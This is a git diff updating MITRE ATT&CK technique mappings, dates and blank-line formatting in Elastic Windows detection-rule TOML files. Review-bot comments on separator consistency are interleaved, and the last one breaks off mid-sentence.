@@ -118,31 +118,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1490" name = "Inhibit System Recovery" reference = "https://attack.mitre.org/techniques/T1490/" - [rule.threat.tactic] id = "TA0040" name = "Impact" reference = "https://attack.mitre.org/tactics/TA0040/" + [[rule.threat]] framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1047" +name = "Windows Management Instrumentation" +reference = "https://attack.mitre.org/techniques/T1047/" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" reference = "https://attack.mitre.org/techniques/T1059/001/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml index 83b0ab0edd9..7bf7d72b1ae 100644 --- a/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml +++ b/rules/windows/initial_access_evasion_suspicious_htm_file_creation.toml @@ -2,7 +2,7 @@ creation_date = "2022/07/03" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -111,10 +111,12 @@ sequence by user.id with maxspan=2m [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" 
@@ -125,27 +127,43 @@ id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique.subtechnique]] id = "T1027.006" name = "HTML Smuggling" reference = "https://attack.mitre.org/techniques/T1027/006/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_execution_from_inetcache.toml b/rules/windows/initial_access_execution_from_inetcache.toml index 1c10e770968..b123d9b673c 100644 --- a/rules/windows/initial_access_execution_from_inetcache.toml +++ b/rules/windows/initial_access_execution_from_inetcache.toml @@ -2,7 +2,7 @@ creation_date = "2024/02/14" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/09/11" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -113,31 +113,49 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1105" name = "Ingress Tool Transfer" reference = "https://attack.mitre.org/techniques/T1105/" - [rule.threat.tactic] id = "TA0011" name = "Command and Control" reference = "https://attack.mitre.org/tactics/TA0011/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_execution_remote_via_msiexec.toml b/rules/windows/initial_access_execution_remote_via_msiexec.toml index 313b2343f65..ed59a607257 100644 --- a/rules/windows/initial_access_execution_remote_via_msiexec.toml +++ b/rules/windows/initial_access_execution_remote_via_msiexec.toml @@ -2,7 +2,7 @@ creation_date = "2023/09/28" integration = ["endpoint"] maturity = "production" -updated_date = "2025/01/15" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -101,36 +101,49 @@ MSIEXEC, the Windows Installer, facilitates software installation, modification, [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.002" name = "Spearphishing Link" reference = "https://attack.mitre.org/techniques/T1566/002/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" + [[rule.threat.technique.subtechnique]] id = "T1218.007" name = "Msiexec" reference = "https://attack.mitre.org/techniques/T1218/007/" - - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" diff --git a/rules/windows/initial_access_execution_via_office_addins.toml b/rules/windows/initial_access_execution_via_office_addins.toml index ce76d88f67f..00b31a4d91b 100644 --- a/rules/windows/initial_access_execution_via_office_addins.toml +++ b/rules/windows/initial_access_execution_via_office_addins.toml @@ -2,7 +2,7 @@ creation_date = "2023/03/20" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -125,36 +125,59 @@ process where [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1137" name = "Office Application Startup" reference = "https://attack.mitre.org/techniques/T1137/" + [[rule.threat.technique.subtechnique]] id = "T1137.006" name = "Add-ins" reference = "https://attack.mitre.org/techniques/T1137/006/" - - [rule.threat.tactic] id = "TA0003" name = "Persistence" reference = "https://attack.mitre.org/tactics/TA0003/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml index 61e732cb424..67466b25d61 100644 --- a/rules/windows/initial_access_exploit_jetbrains_teamcity.toml +++ b/rules/windows/initial_access_exploit_jetbrains_teamcity.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/03/24" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -110,22 +110,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -136,10 +139,88 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1049" +name = "System Network Connections Discovery" +reference = 
"https://attack.mitre.org/techniques/T1049/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml index 018003de5eb..ca1b8afcd21 100644 --- a/rules/windows/initial_access_potential_webhelpdesk_exploit.toml +++ b/rules/windows/initial_access_potential_webhelpdesk_exploit.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/02" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/09" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -92,14 +92,59 @@ any where host.os.type == "windows" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique]] +id = "T1129" +name = "Shared Modules" +reference = "https://attack.mitre.org/techniques/T1129/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_rdp_file_mail_attachment.toml b/rules/windows/initial_access_rdp_file_mail_attachment.toml index f7ff84102c4..9e6429272b6 100644 --- a/rules/windows/initial_access_rdp_file_mail_attachment.toml +++ b/rules/windows/initial_access_rdp_file_mail_attachment.toml 
@@ -2,7 +2,7 @@ creation_date = "2024/11/05" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/08/26" +updated_date = "2026/03/24" [rule] author = ["Elastic"] @@ -100,19 +100,36 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/windows/initial_access_script_executing_powershell.toml b/rules/windows/initial_access_script_executing_powershell.toml index 7ec8d133027..7ea7e0e73c9 100644 --- a/rules/windows/initial_access_script_executing_powershell.toml +++ b/rules/windows/initial_access_script_executing_powershell.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -105,27 +105,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -136,10 +139,12 @@ id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_scripts_process_started_via_wmi.toml b/rules/windows/initial_access_scripts_process_started_via_wmi.toml index 6846a4ea7e0..b60c69c9869 100644 --- a/rules/windows/initial_access_scripts_process_started_via_wmi.toml +++ b/rules/windows/initial_access_scripts_process_started_via_wmi.toml @@ -2,7 +2,7 @@ creation_date = "2020/11/27" integration = ["endpoint", "windows"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
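Review bot: In the second hunk (`@@ -136,10 +139,12 @@`) the four added T1059.007 lines replace one of the two blank lines that preceded `[rule.threat.tactic]`, so on the new side the JavaScript sub-technique block appears to butt directly against the tactic table (the collapsed rendering hides blank context lines, but with git's default three-line leading context the surviving blank sits before the inserted block, not after it). The rest of this patch consistently inserts a `+` blank line between the last technique `reference` and `[rule.threat.tactic]`, so adding that separator after `+reference = "https://attack.mitre.org/techniques/T1059/007/"` would keep the layout uniform. The same pattern shows up for the T1059.007 block in initial_access_scripts_process_started_via_wmi.toml and for the T1203 block in initial_access_suspicious_ms_office_child_process.toml. This is layout only; the TOML is valid either way.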
@@ -106,23 +106,25 @@ sequence by host.id with maxspan = 5s [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1047" name = "Windows Management Instrumentation" @@ -132,15 +134,18 @@ reference = "https://attack.mitre.org/techniques/T1047/" id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.005" name = "Visual Basic" reference = "https://attack.mitre.org/techniques/T1059/005/" - +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" - diff --git a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml index 402f26c77f3..153757b6755 100644 --- a/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml +++ b/rules/windows/initial_access_suspicious_execution_from_vscode_extension.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/13" integration = ["endpoint"] maturity = "production" -updated_date = "2026/02/13" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -84,10 +84,12 @@ process where host.os.type == "windows" and event.action == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1195" name = "Supply Chain Compromise" reference = "https://attack.mitre.org/techniques/T1195/" + [[rule.threat.technique.subtechnique]] id = "T1195.002" name = "Compromise Software Supply Chain" @@ -100,14 +102,32 @@ reference = "https://attack.mitre.org/tactics/TA0001/" [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.001" +name = "PowerShell" +reference = "https://attack.mitre.org/techniques/T1059/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.003" +name = "Windows Command Shell" +reference = "https://attack.mitre.org/techniques/T1059/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.007" +name = "JavaScript" +reference = "https://attack.mitre.org/techniques/T1059/007/" + [[rule.threat.technique]] id = "T1204" name = "User Execution" reference = "https://attack.mitre.org/techniques/T1204/" + [[rule.threat.technique.subtechnique]] id = "T1204.002" name = "Malicious File" 
@@ -117,3 +137,44 @@ reference = "https://attack.mitre.org/techniques/T1204/002/" id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1105" +name = "Ingress Tool Transfer" +reference = "https://attack.mitre.org/techniques/T1105/" + +[rule.threat.tactic] +id = "TA0011" +name = "Command and Control" +reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1218" +name = "System Binary Proxy Execution" +reference = "https://attack.mitre.org/techniques/T1218/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.007" +name = "Msiexec" +reference = "https://attack.mitre.org/techniques/T1218/007/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" + +[rule.threat.tactic] +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/windows/initial_access_suspicious_ms_exchange_files.toml b/rules/windows/initial_access_suspicious_ms_exchange_files.toml index 519fd905a68..1d9ac75eed3 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_files.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_files.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/04" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic", "Austin Songer"] 
@@ -85,26 +85,44 @@ file where host.os.type == "windows" and event.type == "creation" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1210" name = "Exploitation of Remote Services" reference = "https://attack.mitre.org/techniques/T1210/" - [rule.threat.tactic] id = "TA0008" name = "Lateral Movement" reference = "https://attack.mitre.org/tactics/TA0008/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml index 28e435a3737..d6fed06ce9e 100644 --- a/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_exchange_worker_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2021/03/08" integration = ["endpoint", "windows", "m365_defender", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2025/09/12" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -94,22 +94,25 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1190" name = "Exploit Public-Facing Application" reference = "https://attack.mitre.org/techniques/T1190/" - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" @@ -120,10 +123,25 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - - [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1505" +name = "Server Software Component" +reference = "https://attack.mitre.org/techniques/T1505/" + +[[rule.threat.technique.subtechnique]] +id = "T1505.003" +name = "Web Shell" +reference = "https://attack.mitre.org/techniques/T1505/003/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/windows/initial_access_suspicious_ms_office_child_process.toml b/rules/windows/initial_access_suspicious_ms_office_child_process.toml index 74d8fad8028..de4be6c2267 100644 --- a/rules/windows/initial_access_suspicious_ms_office_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_office_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "m365_defender", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
@@ -123,27 +123,30 @@ process where host.os.type == "windows" and event.type == "start" and [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1566" name = "Phishing" reference = "https://attack.mitre.org/techniques/T1566/" + [[rule.threat.technique.subtechnique]] id = "T1566.001" name = "Spearphishing Attachment" reference = "https://attack.mitre.org/techniques/T1566/001/" - - [rule.threat.tactic] id = "TA0001" name = "Initial Access" reference = "https://attack.mitre.org/tactics/TA0001/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" + [[rule.threat.technique.subtechnique]] id = "T1059.001" name = "PowerShell" 
@@ -154,22 +157,103 @@ id = "T1059.003" name = "Windows Command Shell" reference = "https://attack.mitre.org/techniques/T1059/003/" - +[[rule.threat.technique]] +id = "T1203" +name = "Exploitation for Client Execution" +reference = "https://attack.mitre.org/techniques/T1203/" [rule.threat.tactic] id = "TA0002" name = "Execution" reference = "https://attack.mitre.org/tactics/TA0002/" + [[rule.threat]] framework = "MITRE ATT&CK" + [[rule.threat.technique]] id = "T1218" name = "System Binary Proxy Execution" reference = "https://attack.mitre.org/techniques/T1218/" +[[rule.threat.technique.subtechnique]] +id = "T1218.001" +name = "Compiled HTML File" +reference = "https://attack.mitre.org/techniques/T1218/001/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.002" +name = "Control Panel" +reference = "https://attack.mitre.org/techniques/T1218/002/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.003" +name = "CMSTP" +reference = "https://attack.mitre.org/techniques/T1218/003/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.004" +name = "InstallUtil" +reference = "https://attack.mitre.org/techniques/T1218/004/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.005" +name = "Mshta" +reference = "https://attack.mitre.org/techniques/T1218/005/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.008" +name = "Odbcconf" +reference = "https://attack.mitre.org/techniques/T1218/008/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.009" +name = "Regsvcs/Regasm" +reference = "https://attack.mitre.org/techniques/T1218/009/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.010" +name = "Regsvr32" +reference = "https://attack.mitre.org/techniques/T1218/010/" + +[[rule.threat.technique.subtechnique]] +id = "T1218.011" +name = "Rundll32" +reference = "https://attack.mitre.org/techniques/T1218/011/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" +[[rule.threat]] +framework = 
"MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1016" +name = "System Network Configuration Discovery" +reference = "https://attack.mitre.org/techniques/T1016/" + +[[rule.threat.technique]] +id = "T1033" +name = "System Owner/User Discovery" +reference = "https://attack.mitre.org/techniques/T1033/" + +[[rule.threat.technique]] +id = "T1049" +name = "System Network Connections Discovery" +reference = "https://attack.mitre.org/techniques/T1049/" + +[[rule.threat.technique]] +id = "T1057" +name = "Process Discovery" +reference = "https://attack.mitre.org/techniques/T1057/" + +[[rule.threat.technique]] +id = "T1082" +name = "System Information Discovery" +reference = "https://attack.mitre.org/techniques/T1082/" + +[rule.threat.tactic] +id = "TA0007" +name = "Discovery" +reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml index c0828b44e66..964b692c41b 100644 --- a/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml +++ b/rules/windows/initial_access_suspicious_ms_outlook_child_process.toml @@ -2,7 +2,7 @@ creation_date = "2020/02/18" integration = ["endpoint", "windows", "system", "sentinel_one_cloud_funnel", "m365_defender", "crowdstrike"] maturity = "production" -updated_date = "2025/03/20" +updated_date = "2026/03/24" [rule] author = ["Elastic"] 
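Review bot: The added `[[rule.threat.technique]]` block for T1203 follows the T1059.003 `reference` line with no separating blank line, and the first `[[rule.threat.technique.subtechnique]]` under T1218 likewise follows its parent's `reference` directly, while every other block this hunk adds is separated by a blank `+` line; the same pattern recurs in the hunks for initial_access_suspicious_ms_outlook_child_process, initial_access_via_explorer_suspicious_child_parent_args, lateral_movement_cmd_service, lateral_movement_credential_access_kerberos_correlation, lateral_movement_execution_from_tsclient_mup, lateral_movement_execution_via_file_shares_sequence, lateral_movement_incoming_wmi and lateral_movement_remote_file_copy_hidden_share. Since the rest of this patch is normalizing blank lines between sections, those spots look hand-edited after the formatter ran, and re-running it (or inserting the missing blank lines) keeps the files from churning on the next formatting pass. Separately, the new Discovery entry maps five techniques (T1016, T1033, T1049, T1057, T1082) to a rule whose query lies outside the hunk; 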